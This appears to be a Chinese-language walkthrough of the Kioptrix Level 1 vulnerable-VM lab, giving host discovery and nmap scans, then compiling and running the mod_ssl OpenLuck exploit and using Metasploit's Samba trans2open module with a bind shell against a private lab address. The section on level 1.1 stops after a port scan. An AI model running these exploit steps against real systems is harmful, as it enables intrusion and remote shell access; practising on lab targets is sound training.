Kioptrix
目录
Kioptrix Level 1 (#1)
1.查找靶机ip地址
nbtscan 192.168.43.0/24 #netbios协议查找
fping -asg 192.168.43.0/24 #icmp协议查找
arp-scan 192.168.43.0/24 #基于arp协议查找
2.对靶机进行端口扫描
nmap -sV -p- 192.168.43.54
3.1 ssl漏洞利用
mod_ssl<2.8.7有远程缓冲区溢出漏洞,查找并利用
searchsploit "mod_ssl"
cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
gcc -o ssl_exp 47080.c -lcrypto
./ssl_exp 0x6b 192.168.43.54 -c 40 #0x6b为对应的系统
3.2samba协议漏洞利用
(1)msf查找smb版本
search "samba_version"
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.43.54
exploit
(2)msf利用漏洞
search samba 2.2
use exploit/linux/samba/trans2open
set payload linux/x86/shell/bind_tcp
set rhost 192.168.43.54
exploit
Kioptrix Level 1.1 (#2)
1.查找靶机ip
2.端口扫描
nmap -sV -p- 192.168.43.47